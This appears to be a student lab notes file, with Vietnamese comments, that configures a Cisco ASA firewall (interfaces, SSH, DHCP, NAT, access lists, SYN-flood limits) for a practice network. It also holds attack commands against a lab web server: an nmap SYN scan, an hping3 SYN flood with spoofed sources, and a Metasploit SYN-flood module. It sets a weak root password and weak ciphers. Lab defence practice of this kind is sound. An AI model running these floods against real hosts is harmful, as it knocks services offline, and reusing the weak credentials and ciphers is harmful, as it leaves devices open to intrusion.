  1. en
  2. conf t
  3. hostname ASA
  4. domain-name team3.lab
  5. username root password team3 privilege 15
  6. crypto key generate rsa general-key modulus 2048
  7. write
  8.  
  9.  
  10. # Cau hinh may dieu khien
  11. show interface ip brief
  12. int Management0/0
  13. ip address 192.168.56.253 255.255.255.0
  14. no shutdown
  15. nameif Management
  16. management-only
  17. security-level 100
  18. exit
  19.  
  20. # Cau hinh may dich vu
  21. interface GigabitEthernet0/1
  22. nameif dmz
  23. ip address 192.168.255.253 255.255.255.0
  24. no shutdown
  25. exit
  26. write
  27.  
  28. # Cau hinh may inside
  29. interface GigabitEthernet0/0
  30. nameif inside
  31. ip address 192.168.100.253 255.255.255.0
  32. no shutdown
  33. exit
  34. write
  35.  
  36. # Cau hinh may outside
  37. interface GigabitEthernet0/2
  38. nameif outside
  39. ip address 192.168.133.253 255.255.255.0
  40. no shutdown
  41. exit
  42. write
  43.  
  44. # Cau hinh SSH
  45. aaa authentication ssh console LOCAL
  46. ssh 192.168.56.0 255.255.255.0 Management
  47.  
  48. # Update firmware
  49. copy tftp: flash:
  50. http server enable
  51. http 192.168.56.0 255.255.255.0 Management
  52. ssl encryption rc4-sha1 aes128-sha1 aes256-sha1 3des-sha1
  53. conf t
  54. asdm image flash:/asdm-762-150.bin
  55. exit
  56. write
  57.  
  58. # Update anyconnect
  59. copy tftp: flash:
  60. 192.168.56.1
  61. anyconnect-win-4.4.02039.pkg
  62. webvpn
  63. anyconnect image flash:/anyconnect-win-4.4.02039.pkg
  64. anyconnect enable
  65. write
  66.  
  67. # DHCP cho vung inside
  68. dhcpd address 192.168.100.101-192.168.100.200 inside
  69. dhcpd dns 8.8.8.8 8.8.4.4 interface inside
  70. dhcpd lease 28880 interface inside
  71. dhcpd domain team3.lab interface inside
  72. dhcpd option 3 ip 192.168.100.253 interface inside
  73. dhcpd enable inside
  74.  
  75. dhcpd address 192.168.255.101-192.168.255.200 dmz
  76. dhcpd dns 8.8.8.8 8.8.4.4 interface dmz
  77. dhcpd lease 28880 interface dmz
  78. dhcpd domain team3.lab interface dmz
  79. dhcpd option 3 ip 192.168.255.253 interface dmz
  80. dhcpd enable dmz
  81.  
  82. dhcpd address 192.168.133.100-192.168.133.160 outside
  83. dhcpd dns 8.8.8.8 8.8.4.4 interface outside
  84. dhcpd lease 28880 interface outside
  85. dhcpd domain team3.lab interface outside
  86. dhcpd option 3 ip 192.168.133.253 interface outside
  87. dhcpd enable outside
  88.  
  89.  
  90. # Tao Object
  91. object network PUBLIC_IP
  92.  range 192.168.133.100 192.168.133.160
  93. exit
  94. object network DMZ
  95.  subnet 192.168.255.0 255.255.255.0
  96. exit
  97. object network INTERNAL
  98.  subnet 192.168.100.0 255.255.255.0
  99. exit
  100.  
  101. # Thiet lap NAT cho vung inside
  102. object network INTERNAL
  103.  nat (inside,outside) dynamic interface
  104. exit
  105.  
  106. object network DMZ
  107.  nat (dmz,outside) dynamic interface
  108. exit
  109.  
  110. object network PUBLIC_IP
  111.  nat (outside,dmz) dynamic interface
  112. exit
  113.  
  114.  
  115. # Nat cho vung dmz
  116. object network WEB-SERVER
  117.  host 192.168.255.129
  118.  nat (dmz,outside) static interface service tcp 80 80
  119. exit
  120.  
  121. object network WEB-SERVER
  122.  host 192.168.255.129
  123.  nat (dmz,outside) dynamic interface
  124. exit
  125.  
  126.  
  127. # DDos server 192.168.255.129
  128. --  Quet port dang bat tren server
  129.                                     nmap -Pn -sS 192.168.255.129
  130.     Hien cong 23/tcp
  131. --  Attack
  132.                                     hping3 -S -p 80 --flood --rand-source 192.168.255.129
  133.  
  134. # Tao access-list cho host 192.168.255.129
  135. access-list inside2outside permit ip 192.168.100.0 255.255.255.0 any
  136. access-list inside2outside permit icmp 192.168.100.0 255.255.255.0 any
  137. access-group inside2outside in interface inside
  138.  
  139. access-list dmz2outside permit ip 192.168.255.0 255.255.255.0 any
  140. access-list dmz2outside permit icmp 192.168.255.0 255.255.255.0 any
  141. access-list dmz2outside permit tcp 192.168.255.0 255.255.255.0 any
  142. access-group dmz2outside in interface dmz
  143.  
  144.  
  145. access-list outside2dmz permit ip 192.168.133.0 255.255.255.0 any
  146. access-list outside2dmz permit icmp 192.168.133.0 255.255.255.0 any
  147. access-list outside2dmz permit tcp 192.168.133.0 255.255.255.0 any
  148. access-group outside2dmz in interface outside
  149.  
  150.  
  151.  
  152. access-list syn permit tcp any host 192.168.255.129 eq telnet
  153. access-list syn permit tcp any host 192.168.255.129 eq ssh
  154. access-list syn permit tcp any host 192.168.255.129 eq http
  155. access-list syn permit tcp any host 192.168.255.129 eq https
  156.  
  157.  
  158. # Defence firewall
  159. access-list syn permit tcp any 192.168.255.129 eq 23
  160. class-map syn
  161. match access-list syn
  162. show run service-policy
  163. policy-map global_policy
  164. class dos
  165. set connection embryonic-conn-max 100
  166. end
  167. show run policy-map
  168. show conn count
  169.  
  170.  
  171. policy-map syn
  172. class dos
  173. set connection embryonic-conn-max 10000
  174.  
  175.  
  176.  
  177.  
  178.  
  179.  
  180. conf t
  181. access-list syn permit tcp any host 13.0.0.1 eq telnet
  182. access-list syn permit tcp any host 13.0.0.1 eq ssh
  183. access-list syn permit tcp any host 13.0.0.1 eq http
  184. access-list syn permit tcp any host 13.0.0.1 eq https
  185. access-list syn permit tcp any host 13.0.0.1
  186. write
  187. access-group syn in interface outside
  188.  
  189.  
  190. show resource usage all
  191. show threat-detection rate
  192.  
  193.  
  194. # Cau hinh may dich vu
  195. ifconfig eth0 192.168.255.129 netmask 255.255.255.0
  196. route add default gw 192.168.255.253 eth0
  197.  
  198.  
  199.  
  200. msfconsole
  201. use auxiliary/dos/tcp/synflood
  202. show options
  203. set RHOST 192.168.255.129
  204. exploit
  205.  
  206.  
  207.  
  208.  
  209. access-list To_server permit tcp any host 192.168.255.101
  210. access-list To_server permit tcp any any
  211. class-map Traffic_to_dmz_server
  212. match access-list To_server
  213. exit
  214.  
  215. policy-map global_policy
  216. class Traffic_to_dmz_server
  217. set connection embryonic-conn-max 5
  218. exit
  219. exit
  220.  
  221.  
  222. access-list To_server permit tcp any host 192.168.255.101
  223. access-list To_server permit tcp any any
  224. class-map Traffic_to_dmz
  225. match access-list outside2dmz
  226. exit
  227.  
  228. policy-map global_policy
  229. class Traffic_to_dmz
  230. set connection embryonic-conn-max 5
  231. exit
  232. exit
  233.  
  234.  
  235. class-map outside2dmz
  236. match access-list outside2dmz
  237. policy-map global_policy
  238. class outside2dmz
  239.  
  240. # Attack and defence
  241. -- Bat dich vu web
  242. sudo python -m SimpleHTTPServer 80
  243. -- Quet mo cong 80
  244. nmap -Pn -sS -p 80 192.168.255.129
  245. --
  246. hping3 -S -p 80 --flood --rand-source 192.168.255.129
  247.  
  248.  
  249. class outside2dmz